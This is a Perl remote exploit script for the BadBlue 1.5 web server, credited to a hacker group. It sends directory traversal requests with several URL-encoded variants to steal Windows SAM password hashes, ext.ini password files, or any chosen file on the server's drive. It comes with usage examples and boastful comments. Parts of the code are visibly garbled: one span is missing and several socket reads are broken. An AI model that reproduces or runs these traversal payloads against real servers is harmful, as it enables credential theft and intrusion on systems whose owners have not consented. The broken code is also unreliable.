#!/usr/bin/perl # # - [ElectronicSouls] Private Do Not Distrobute - # # Remote Exploit For BadBlue 1.5 Web Server # www.badblue.com # # A transversal bug has been discovered in # BadBlue HTTP Daemon SoftWare. This is a # gay bug, yes I know. But it can be kinda # funny for those days you are bored =) # # Vulnerable System: Windows 95 # Windows 98 # Windows ME # Windows NT 3.5 # Windows NT 4.0 # Windows 2000 # Windows XP # # syntax: # # -h --- Specify Host Name # -p --- Specify Host Port # -o --- For Grabbing Anothern file # -l --- For Logging. # -O --- Specify What OS # 9x --- For Windows 95/98/mE (Gets the ext.ini with passwords) # NT --- For Windows NT 3/4 (Gets sam file and ext.ini) # 2K --- For Windows 2K SP-012 (Gets sam file and ext.ini) # XP --- For Windows XP ALL # # perl badxploit.pl -h www.host.com -p 80 -l esh0yday.log -O 9x - For Win/9x # perl badxploit.pl -h www.host.com -p 80 -l esh0yday.log -O NT - For Win/NT # perl badxploit.pl -h www.host.com -p 80 -l esh0yday.log -o 2X - For Win/2K/XP # # ************************************************************************* # ** For the '-o' syntax you need to know the exact location of the file ** # ** NOTE! You can only get files from the same drive as BadBlue ** # ** ** # ** Eg if($badblue-drive == $c:) {syntax will be get a file C:\boot.ini ** # ** perl badxploit.pl -h www.host.com -p 80 -l es.log -o boot.ini } ** # ** Now check es.log for the contents of boot.ini =) ** # ************************************************************************* # # You'll figure it out, If you don't understand. # # Greets: Websk8ter, BrainStorm, asmodian, _0x90_, divine, FreQ, northern, CraiK # kokshin, rocky, omnis, NtWaK0, loophole, icesk, tsilik, crazyl0rd, [t]hief # CraigTM, DeadMouse, irrupt, izik, sagi, ofer, natrix, samko, blah everyone else # [!ElectronicSouls], HHP # # Special THNX AND GREET TO *** Pneuma *** for being there for me =) Luv ya!@ # # Bug discovered and written by Iceburg of [!ElectronicSouls]. use Socket; use Getopt::Std; getopts("O:o:h:p:l:", \%args); print ("\n"); print ("==================================================\n"); print ("== -- Remote Exploit For BadBlue 1.5 WebServers ==\n"); print ("== -- Discovered and Written By Iceburg ==\n"); print ("== -- [ElectronicSouls] Production. ==\n"); print ("==================================================\n"); print ("\n"); if (!defined $args{h}) { print qq~ syntax: -h --- Specify Host Name -p --- Specify Host Port -o --- For Grabbing Anothern file -l --- For Logging. -O --- Specify What OS --9x --- For Windows 95/98/mE (Gets the ext.ini with passwords) --NT --- For Windows NT 3/4 (Gets sam file and ext.ini) --2K --- For Windows 2K SP-012 (Gets sam file and ext.ini) --XP --- For Windows XP ALL Syntax are case sensitive =) ~; exit; } if (defined $args{h}) { $host=$args{h}; print "*** Exploiting $host ...\n"; } if (defined $args{p}) { $port = $args{p} } else { $port = "80"; } if (defined $args{l}) { $file=$args{l}; $log=1; open (LOG,">$file") || die ("*** Cannot open file for logging\n"); print LOG ("*** [ElectronicSouls] Production\n"); print LOG ("*** BadBlue 1.5 Remote Exploit\n"); print LOG ("*** Discovered And Written By Iceburg\n\n"); } # This is like eleet unicode. # I know more but I am too lazy to type it out. # If these don't work try adding some more ..%2F||252f||255c.. # These are for default directories, if the directory ain't default # it won't work, therefor you can use '-o' syntax. # Win9x/mE Strings && WinNT/2K/XP @sploits1 = ( "[ElectronicSouls]/..%2f../ext.ini", # Main String "[0WNZ]/..%252f..%252f../ext.ini", # Alternative "[YOU]/..%255c..%255c../ext.ini", ); # Alternative # WinNT Strings @sploits2 = ( "..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam._", "..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam._", "..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam._",); # Win2K Strings @sploits3 = ( "..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam", "..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam", "..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam",); # WinXP String @sploits4 = ( "..%2F..%2F..%2F..%2F..%2F../windows/repair/sam", "..%252f..%252f..%252f..%252f..%252f../windows/repair/sam", "..%255c..%255c..%255c..%255c..%255c../windows/repair/sam",); if (defined $args{o}) { $string = $args{o}; print ("*** Using Manual String $string\n"); &connect; send(SOCK,"GET /$string HTTP/1.0\r\n\r\n",0); @ocheck=; ($http,$code,$blah) = split(/ /,$ocheck[0]); if($code == 200) { print ("=========================\n"); print ("*** Server is vulnerable \n"); print ("=========================\n"); print ("\n @ocheck\n"); print ("=========================\n"); if ($log) { print LOG ("==========================\n"); } if ($log) { print LOG ("*** Server is vulnerable \n"); } if ($log) { print LOG ("==========================\n"); } if ($log) { print LOG ("@ocheck\n"); } if ($log) { print LOG ("==========================\n"); } die ("*** J00 15 kr4d+LUC|; ($http,$code,$blah) = split(/ /,$check4[0]); if($code == 200) { print ("=========================\n"); print ("*** Server is vulnerable \n"); print ("*** Getting sam file \n"); print ("=========================\n"); print ("\n"); open(SAM,">sam") || error(); my $x; for ($x=8;$x<=30;$x++) { print SAM ("$check4[$x]"); } test1(); } else { print ("*** Server is not vulberable to string $xploit4\n"); } close(SOCK); } } sub test3 { foreach $xploit3 (@sploits3) { &connect; send(SOCK,"GET /$xploit3 HTTP/1.0\r\n\r\n",0); @check3=; ($http,$code,$blah) = split(/ /,$check3[0]); if($code == 200) { print ("=========================\n"); print ("*** Server is vulnerable \n"); print ("*** Getting sam file \n"); print ("=========================\n"); print ("\n"); open(SAM,">sam") || error(); my $x; for ($x=8;$x<=30;$x++) { print SAM ("$check3[$x]"); } test1(); } else { print ("*** Server is not vulberable to string $xploit3\n"); } close(SOCK); } } sub test2 { foreach $xploit2 (@sploits2) { &connect; send(SOCK,"GET /$xploit2 HTTP/1.0\r\n\r\n",0); @check2=; ($http,$code,$blah) = split(/ /,$check2[0]); if($code == 200) { print ("=========================\n"); print ("*** Server is vulnerable \n"); print ("*** Getting sam file \n"); print ("=========================\n"); print ("\n"); open(SAM,">sam") || error(); my $x; for ($x=8;$x<=30;$x++) { print SAM ("$check2[$x]\n"); } test1(); } else { print ("*** Server is not vulberable to string $xploit2\n"); } close(SOCK); } } sub test1 { foreach $xploit1 (@sploits1) { &connect; send(SOCK,"GET /$xploit1 HTTP/1.0\r\n\r\n",0); @check=; #print "@check"; ($http,$code,$blah) = split(/ /,$check[0]); if($code == 200) { print ("===============================\n"); print ("*** Getting contents of ext.ini\n"); print ("*** Server is vulnerable \n"); print ("===============================\n"); print ("\n @check\n"); print ("===============================\n"); if ($log) { print LOG ("==========================\n"); } if ($log) { print LOG ("*** Server is vulnerable \n"); } if ($log) { print LOG ("*** Contents of ext.ini \n"); } if ($log) { print LOG ("==========================\n"); } for ($i=8;$i<=@check;$i++) { if ($log) { print LOG ("$check[$i]"); } } if ($log) { print LOG ("==========================\n"); } die ("*** J00 15 kr4d-hax0r n0w\n"); } else { print ("*** Server is not vulberable to string $xploit1\n"); } close(SOCK); } } sub connect { my($iaddr,$paddr,$proto); $iaddr = inet_aton($host) || die "Error: $!"; $paddr = sockaddr_in($port, $iaddr) || die "Error: $!"; $proto = getprotobyname('tcp') || die "Error: $!"; socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die("Failed to open socket: $!"); connect(SOCK, $paddr) || die("Unable to connect: $!"); } sub error { print ("For some weird reason a error has occured: $!\n"); print ("Continueing ...\n"); }